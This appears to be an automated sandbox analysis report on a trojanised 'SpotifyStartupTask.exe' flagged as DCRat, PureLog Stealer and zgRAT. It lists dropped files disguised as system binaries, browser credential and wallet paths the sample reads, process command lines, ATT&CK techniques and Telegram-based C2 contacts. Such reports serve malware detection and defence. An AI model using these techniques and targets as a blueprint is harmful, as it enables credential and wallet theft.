                              Source: SpotifyStartupTask.exe, 00000000.00000002.1273206692.000000001BD6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\+?
                              Source: knl7bHUrFR.29.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                              Source: knl7bHUrFR.29.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                              Source: knl7bHUrFR.29.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                              Source: knl7bHUrFR.29.drBinary or memory string: outlook.office.comVMware20,11696487552s
                              Source: knl7bHUrFR.29.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess token adjusted: Debug
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess token adjusted: Debug
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess token adjusted: Debug
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess token adjusted: Debug
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: Debug
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess token adjusted: Debug
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"0","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",5,1,"????????+??????????","user","855271","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\AppReadiness","8ZDV8O6 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeQueries volume information: C:\Windows\DiagTrack\dwm.exe VolumeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeQueries volume information: C:\Windows\DiagTrack\dwm.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeQueries volume information: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe VolumeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeQueries volume information: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeQueries volume information: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe VolumeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeQueries volume information: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeQueries volume information: C:\Program Files\7-Zip\Lang\winlogon.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeQueries volume information: C:\Program Files\7-Zip\Lang\winlogon.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: SpotifyStartupTask.exe PID: 6696, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 2432, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: JNXeqwRJ1WmUZ.exe PID: 7232, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                              Source: SpotifyStartupTask.exe, 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: SpotifyStartupTask.exe PID: 6696, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 2432, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: JNXeqwRJ1WmUZ.exe PID: 7232, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Web Service                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory134
                              System Information Discovery                              		Remote Desktop Protocol2
                              Data from Local System                              		1
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		2
                              Obfuscated Files or Information                              		Security Account Manager331
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		11
                              Encrypted Channel                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		12
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput Capture3
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets261
                              Virtualization/Sandbox Evasion                              		SSHKeylogging14
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items233
                              Masquerading                              		DCSync1
                              System Network Configuration Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639975 Sample: SpotifyStartupTask.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 57 api.telegram.org 2->57 59 009383cm.nyashk.ru 2->59 61 2 other IPs or domains 2->61 69 Suricata IDS alerts for network traffic 2->69 71 Antivirus detection for URL or domain 2->71 73 Antivirus detection for dropped file 2->73 77 14 other signatures 2->77 8 SpotifyStartupTask.exe 28 35 2->8         started        13 JNXeqwRJ1WmUZ.exe 2->13         started        15 JNXeqwRJ1WmUZ.exe 2->15         started        17 10 other processes 2->17 signatures3 75 Uses the Telegram API (likely for C&C communication) 57->75 process4 dnsIp5 63 api.telegram.org 149.154.167.220, 443, 49695, 49711 TELEGRAMRU United Kingdom 8->63 65 ipinfo.io 34.117.59.81, 443, 49692, 49694 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->65 41 C:\Windows\...\PQ4HCWgZazguIsFyU1PhJ.exe, PE32 8->41 dropped 43 C:\Windows\DiagTrack\dwm.exe, PE32 8->43 dropped 45 C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, PE32 8->45 dropped 53 16 other malicious files 8->53 dropped 81 Creates an undocumented autostart registry key 8->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 8->83 85 Creates multiple autostart registry keys 8->85 97 4 other signatures 8->97 19 csc.exe 4 8->19         started        23 cmd.exe 8->23         started        25 schtasks.exe 8->25         started        27 17 other processes 8->27 67 009383cm.nyashk.ru 104.21.33.71, 49699, 49701, 49702 CLOUDFLARENETUS United States 13->67 47 C:\Users\user\Desktop\wcHMhvIM.log, PE32 13->47 dropped 49 C:\Users\user\Desktop\sMvnZGVS.log, PE32 13->49 dropped 51 C:\Users\user\Desktop\jWsFKvpe.log, PE32 13->51 dropped 55 4 other malicious files 13->55 dropped 87 Tries to harvest and steal browser information (history, passwords, etc) 13->87 89 Antivirus detection for dropped file 15->89 91 Multi AV Scanner detection for dropped file 15->91 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->93 95 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->95 file6 signatures7 process8 file9 39 C:\Windows\...\SecurityHealthSystray.exe, PE32 19->39 dropped 79 Infects executable files (exe, dll, sys, html) 19->79 29 conhost.exe 19->29         started        31 cvtres.exe 1 19->31         started        33 conhost.exe 23->33         started        35 chcp.com 23->35         started        37 w32tm.exe 23->37         started        signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.